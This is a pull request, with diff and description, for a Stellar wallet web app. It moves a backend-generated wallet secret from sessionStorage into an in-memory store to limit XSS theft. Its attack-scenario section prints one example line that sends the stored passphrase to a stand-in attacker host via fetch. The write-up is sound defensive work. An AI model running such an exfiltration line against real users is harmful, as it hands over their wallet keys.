### PR TITLE
fix(security): move temp_passphrase from sessionStorage to in-memory store

### DIFF
--- a/app/auth/signin/page.tsx
+++ b/app/auth/signin/page.tsx
@@ -9,7 +9,7 @@ import { Card } from "@/components/ui/card";
 import { AlertCircle, Eye, EyeOff } from "lucide-react";
 import { useAuth } from "@/contexts/auth-context";
 import * as authApi from "@/lib/api/auth";
-import { setPasscode as storePasscode } from "@/lib/passcode-manager";
+import { setPasscode as storePasscode, setTempPassphrase } from "@/lib/passcode-manager";
 
 export default function SignInPage() {
     return (
@@ -75,7 +75,7 @@ function SignInForm() {
         login(result.user_id, result.stellar_address);
         
         if (result.wallet_created && result.passphrase) {
-          sessionStorage.setItem('temp_passphrase', result.passphrase);
+          setTempPassphrase(result.passphrase);
           router.push('/auth/wallet-setup');
         } else {
           router.push("/");

--- a/app/auth/wallet-setup/page.tsx
+++ b/app/auth/wallet-setup/page.tsx
@@ -11,7 +11,7 @@ import { useAuth } from "@/contexts/auth-context";
 import { useStellarWalletsKit } from "@/lib/stellar-wallets-kit";
 import * as userApi from "@/lib/api/user";
 import { storeWalletSecret } from "@/lib/wallet-storage";
-import { getPasscode } from "@/lib/passcode-manager";
+import { getPasscode, getTempPassphrase, clearTempPassphrase } from "@/lib/passcode-manager";
 import { AlertCircle, CheckCircle, ChevronLeft, Lock } from "lucide-react";
 import { Keypair } from "@stellar/stellar-sdk";
 
@@ -45,19 +45,19 @@ export default function WalletSetupPage() {
     const passcode = getPasscode();
     if (!passcode) {
       // Passcode lost on refresh, clear temp data and redirect to signin
-      sessionStorage.removeItem("temp_passphrase");
+      clearTempPassphrase();
       router.push("/auth/signin");
       return;
     }
 
     // If user already has a wallet address, skip setup and go home
-    if (stellarAddress && !sessionStorage.getItem("temp_passphrase")) {
+    if (stellarAddress && !getTempPassphrase()) {
       router.push("/");
       return;
     }
 
     // Check if we have an auto-generated passphrase from signin
-    const autoGenPassphrase = sessionStorage.getItem("temp_passphrase");
+    const autoGenPassphrase = getTempPassphrase();
     if (autoGenPassphrase) {
       setPassphrase(autoGenPassphrase);
       setOption(1); // Show the confirmation step
@@ -115,8 +115,8 @@ export default function WalletSetupPage() {
       await syncWalletToBackend(passphrase);
       setSuccess("Wallet set up successfully!");
       
-      // Clean up session storage
-      sessionStorage.removeItem("temp_passphrase");
+      // Clean up in-memory temp passphrase
+      clearTempPassphrase();
       
       // Refresh user context to update stellar address
       await refreshStellarAddress();
@@ -147,8 +147,8 @@ export default function WalletSetupPage() {
       await syncWalletToBackend(importSeed);
       setSuccess("Wallet imported successfully!");
       
-      // Clean up session storage
-      sessionStorage.removeItem("temp_passphrase");
+      // Clean up in-memory temp passphrase
+      clearTempPassphrase();
       
       // Refresh user context
       await refreshStellarAddress();

--- a/components/wallet-setup-modal.tsx
+++ b/components/wallet-setup-modal.tsx
@@ -8,7 +8,7 @@ import { useAuth } from "@/contexts/auth-context";
 import { useStellarWalletsKit } from "@/lib/stellar-wallets-kit";
 import * as userApi from "@/lib/api/user";
 import { storeWalletSecret } from "@/lib/wallet-storage";
-import { getPasscode } from "@/lib/passcode-manager";
+import { getPasscode, getTempPassphrase, clearTempPassphrase } from "@/lib/passcode-manager";
 import { AlertCircle, ChevronLeft, Lock } from "lucide-react";
 import { Keypair } from "@stellar/stellar-sdk";
 
@@ -34,7 +34,7 @@ export function WalletSetupModal() {
     }
     
     // Check if we have an auto-generated passphrase from signin
-    const autoGenPassphrase = sessionStorage.getItem("temp_passphrase");
+    const autoGenPassphrase = getTempPassphrase();
     
     // Check if user has removed their local wallet from settings
     // If they have no stellarAddress, we definitely show it.
@@ -62,7 +62,7 @@ export function WalletSetupModal() {
   }, [isAuthenticated, stellarAddress]);
 
   const handleFinish = async () => {
-    sessionStorage.removeItem("temp_passphrase");
+    clearTempPassphrase();
     localStorage.removeItem("force_wallet_setup");
     await refreshStellarAddress();
     setOpen(false);
@@ -193,7 +193,7 @@ export function WalletSetupModal() {
   return (
     <Dialog open={open} onOpenChange={(val) => {
       // Prevent closing the modal if the user doesn't have a wallet or needs to confirm passphrase
-      const hasTempPassphrase = sessionStorage.getItem("temp_passphrase");
+      const hasTempPassphrase = getTempPassphrase();
       if (isAuthenticated && (!stellarAddress || hasTempPassphrase)) return;
       setOpen(val);
     }}>

--- a/lib/passcode-manager.ts
+++ b/lib/passcode-manager.ts
@@ -9,6 +9,7 @@
  */
 
 let inMemoryPasscode: string | null = null;
+let inMemoryTempPassphrase: string | null = null;
 
 /**
  * Store passcode in memory for the current session.
@@ -39,4 +40,21 @@ export function clearPasscode(): void {
  */
 export function hasPasscode(): boolean {
   return inMemoryPasscode !== null;
+}
+
+/**
+ * Store the backend-generated wallet passphrase in memory only.
+ * Never written to sessionStorage/localStorage to prevent XSS exfiltration.
+ * Cleared after wallet setup completes or on logout/refresh.
+ */
+export function setTempPassphrase(passphrase: string): void {
+  inMemoryTempPassphrase = passphrase;
+}
+
+export function getTempPassphrase(): string | null {
+  return inMemoryTempPassphrase;
+}
+
+export function clearTempPassphrase(): void {
+  inMemoryTempPassphrase = null;
 }


### PR DESCRIPTION
closes #309 

fix(security): Remove temp_passphrase from sessionStorage to prevent XSS
  exfiltration
  
  Summary
  
  The backend-generated Stellar secret key (passphrase) was being stored in
  sessionStorage under the key temp_passphrase immediately after sign-in. This
  made the raw private key readable by any JavaScript running on the page for
  the entire duration of the wallet setup flow — a critical XSS exfiltration
  risk.
  
  ────────────────────────────────────────────────────────────────────────────
  
  Vulnerability Detail
  
  Location: app/auth/signin/page.tsx
  
  Attack scenario:
  
  1. User signs in for the first time; backend generates a Stellar keypair and
  returns the secret in result.passphrase
  2. App writes it to sessionStorage:
  
     sessionStorage.setItem('temp_passphrase', result.passphrase);
  
  3. Any XSS payload — malicious npm dependency, injected ad script, stored
  XSS — can immediately read it:
  
     fetch('https://attacker.com/?k=' +
  sessionStorage.getItem('temp_passphrase'));
  
  4. Attacker now has full control of the user's Stellar wallet before setup
  even completes
  
  Severity: Critical — full wallet key compromise
  
  ────────────────────────────────────────────────────────────────────────────
  
  Fix
  
  Replaced sessionStorage with a module-level in-memory variable in
  lib/passcode-manager.ts. This is the same pattern already used for the
  passcode. Module-level variables have no Web Storage API surface and cannot
  be enumerated or read via sessionStorage/localStorage APIs.
  
  ────────────────────────────────────────────────────────────────────────────
  
  Files Changed
  
  ┌───────────────────────────────────┬────────────────────────────────────┐
  │ File                              │ Change                             │
  ├───────────────────────────────────┼────────────────────────────────────┤
  │ lib/passcode-manager.ts           │ Added setTempPassphrase(),         │
  │                                   │ getTempPassphrase(),               │
  │                                   │ clearTempPassphrase()              │
  ├───────────────────────────────────┼────────────────────────────────────┤
  │ app/auth/signin/page.tsx          │ Write site: sessionStorage.setItem │
  │                                   │ → setTempPassphrase()              │
  ├───────────────────────────────────┼────────────────────────────────────┤
  │ app/auth/wallet-setup/page.tsx    │ Read sites: all                    │
  │                                   │ sessionStorage.getItem/remove      │
  │                                   │ Item('temp_passphrase') →          │
  │                                   │ in-memory accessors                │
  ├───────────────────────────────────┼────────────────────────────────────┤
  │ components/wallet-setup-modal.tsx │ Read sites: same replacements      │
  │                                   │ including onOpenChange guard       │
  └───────────────────────────────────┴────────────────────────────────────┘
  
  Diff — write site:
  
  - sessionStorage.setItem('temp_passphrase', result.passphrase);
  + setTempPassphrase(result.passphrase);
  
  Diff — read sites:
  
  - const autoGenPassphrase = sessionStorage.getItem('temp_passphrase');
  + const autoGenPassphrase = getTempPassphrase();
  
  - sessionStorage.removeItem('temp_passphrase');
  + clearTempPassphrase();
  
  - if (stellarAddress && !sessionStorage.getItem('temp_passphrase'))
  + if (stellarAddress && !getTempPassphrase())
  
  ────────────────────────────────────────────────────────────────────────────
  
  Verification
  
  grep -r "sessionStorage.*temp_passphrase" --include="*.ts" --include="*.tsx"
  # → 0 matches in source files
  
  ────────────────────────────────────────────────────────────────────────────
  
  Residual Risk
  
  Active XSS executing in the same JS context can still access module-level
  variables while they are live in memory. This is unavoidable in a browser
  environment. The fix eliminates the persistent, inspectable storage surface
  and reduces the exposure window to only the seconds the passphrase is held
  in memory during wallet setup — after which clearTempPassphrase() zeroes it
  out.
  
  ────────────────────────────────────────────────────────────────────────────
  
  Testing
  
  - Sign in with a new account → wallet setup flow completes normally
  - sessionStorage contains no temp_passphrase key at any point during the
  flow
  - Page refresh during wallet setup correctly redirects to sign-in
  (passphrase cleared from memory, same behaviour as before)
